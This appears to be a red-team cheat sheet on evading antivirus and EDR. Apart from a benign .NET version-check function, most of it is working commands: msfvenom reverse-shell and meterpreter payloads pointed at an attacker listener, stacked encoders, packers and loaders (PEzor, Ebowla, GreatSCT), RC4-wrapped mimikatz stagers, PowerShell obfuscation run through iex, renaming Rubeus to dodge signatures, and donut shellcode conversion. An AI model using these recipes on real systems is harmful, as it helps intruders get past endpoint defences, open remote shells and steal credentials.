AV / EDR Evasion

BypassAV Mindmap
Common AV process names:

| Process Name | Vendor/Product |
|---|---|
| avp.exe | KIS / KES |
| cpda.exe | Check Point End Point Security |
| egui.exe | ESET GUI |
| ekrn.exe | ESET Kernel Service |
| MsMpEng.exe | Windows Defender |
| ntrtscan.exe | Trend Micro OfficeScan |
| tmlisten.exe | Trend Micro OfficeScan |
Search for active AV processes on hosts (local admin privileges required):
Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}
Identify the installed .NET Framework version by inspecting the CLR assembly's file properties:
PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
Or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion
Identify the installed .NET Framework version by querying the registry (the Release DWORD):
PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release
Windows build <-> default .NET Framework version associations:

| Windows Build | Default .NET Framework Version |
|---|---|
| 1511 | 4.6.1 |
| 1607 | 4.6.2 |
| 1703 | 4.7 |
| 1709 | 4.7.1 |
| 1803 | 4.7.2 |
| 1909+ | 4.8 |

.NET Framework version <-> CLR version associations:

| .NET Framework Version | CLR Version |
|---|---|
| 2.0, 3.0, 3.5 | 2 |
| 4, 4.5-4.8 | 4 |
Note that we don't have to target the exact .NET Framework version when compiling our tools. It's enough to match the relationship above between .NET Framework version and CLR version, i.e. all 4.x versions execute on CLR v4. For example, Rubeus compiled to target v4.5 will run on a machine with only .NET v4.0 installed.
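As an added example (not part of the original notes), the following PowerShell function ties the two checks above together: it reads the Release DWORD from the NDP\v4\Full key, resolves it to a .NET Framework version using the minimum Release values Microsoft documents for that key, reports the CLR major version the framework maps to, and reads the file version of clr.dll from the v4.0.30319 directory. The function name and output object layout are my own choices; the registry key and clr.dll path are the ones used on this page.

```powershell
# Added example: resolve the installed .NET Framework 4.x version and the CLR
# it runs on, so a tool's compiled target framework can be checked against the
# host before deployment. Function name and output shape are assumptions.
function Get-DotNetFrameworkInfo {
    [CmdletBinding()]
    param()

    # Minimum "Release" DWORD values per .NET Framework version, as documented
    # by Microsoft for HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full.
    # Ordered from newest to oldest so the first match wins.
    $releaseTable = [ordered]@{
        533320 = '4.8.1'
        528040 = '4.8'
        461808 = '4.7.2'
        461308 = '4.7.1'
        460798 = '4.7'
        394802 = '4.6.2'
        394254 = '4.6.1'
        393295 = '4.6'
        379893 = '4.5.2'
        378675 = '4.5.1'
        378389 = '4.5'
    }

    $key = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full'
    # Throws if the key is missing, i.e. no .NET Framework 4.5+ is installed.
    $release = (Get-ItemProperty -Path $key -Name Release -ErrorAction Stop).Release

    $version = 'unknown (Release below 4.5 threshold)'
    foreach ($entry in $releaseTable.GetEnumerator()) {
        if ($release -ge $entry.Key) {
            $version = $entry.Value
            break
        }
    }

    # Every 4.x framework runs on CLR v4 (see the framework/CLR table above);
    # the clr.dll file version shows the exact runtime build present.
    $clrDll = Join-Path $env:windir 'Microsoft.NET\Framework64\v4.0.30319\clr.dll'
    $clrFileVersion = if (Test-Path $clrDll) {
        [System.Diagnostics.FileVersionInfo]::GetVersionInfo($clrDll).FileVersion
    } else {
        'n/a (64-bit CLR v4 directory not found)'
    }

    [pscustomobject]@{
        Release          = $release
        FrameworkVersion = $version
        ClrMajorVersion  = 4
        ClrFileVersion   = $clrFileVersion
    }
}

# Usage: print the resolved framework and CLR details for this host.
Get-DotNetFrameworkInfo | Format-List
```

Because the comparison walks the table from newest to oldest and stops at the first Release value the host meets or exceeds, a Release DWORD that is higher than any listed value (a newer servicing update) still resolves to the latest known version rather than to "unknown".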
$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe
Hyperion + Pescramble
$ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe
Install and generate a payload:
$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}
$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
Exec with msbuild.exe and get a shell:
PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml
$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
...Edit output_type, payload_type, clean_output, [[ENV_VAR]]...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe
Wrap executable into PEzor:
$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2
Cmd > .\Huan.exe mimikatz.exe mimiLoader.exe
Cmd > .\mimiLoader.exe
$ sudo apt install 'mingw-w64*' -y
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin
$ python charlotte.py
Cmd > rundll32.exe charlotte.dll, <XOR_KEY>
$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate
$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe
PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec
PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex
PS > wget https://github.com/h4wkst3r/InvisibilityCloak/raw/main/InvisibilityCloak.py -o InvisibilityCloak.py
PS > git clone https://github.com/GhostPack/Rubeus
PS > python .\InvisibilityCloak.py -d .\Rubeus\ -n (-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})) -m reverse
PS > cd Rubeus
PS > devenv /build Release .\ChOVuwPZcNQmXtKF.sln
InvisibilityCloak.ps1
# Repository to clone ("owner/name"), the InvisibilityCloak script, and the Visual Studio CLI build driver
$repo = "GhostPack/Rubeus"
$cloak = "C:\Users\snovvcrash.NIGHTCITY\Desktop\Tools\InvisibilityCloak.py"
$devenv = "C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.com"
# Project name is the part after the slash; the obfuscated name is 16 random ASCII letters
$target = $repo.Split('/')[1]
$obf = -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
git clone "https://github.com/$repo" "C:\Windows\Temp\$target"
# Rename the project/solution to the random name and obfuscate strings, then build the Release configuration
python $cloak -d "C:\Windows\Temp\$target" -n $obf -m reverse
& $devenv /build Release "C:\Windows\Temp\$target\$obf.sln"
# Copy the built binary out to the host share; uncomment the last line to clean up the working tree
mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Folders\share-host\$obf.exe"
#Remove-Item -Recurse -Force "C:\Windows\Temp\$target"
Execution.ShellCode
$ ~/tools/PEzor/deps/donut/donut -i GruntHTTP.exe -o grunt.bin
$ echo -n 'var shellcode = Convert.FromBase64String("' > shellcode.txt
$ echo -n `base64 -w0 grunt.bin` >> shellcode.txt
$ echo '");' >> shellcode.txt
$ echo 'ShellCode.ShellCodeExecute(shellcode);' >> shellcode.txt
$ ~/.dotnet/dotnet bin/Debug/netcoreapp2.1/SharpGen.dll -f payload.exe -s shellcode.txt -c Shell -d net40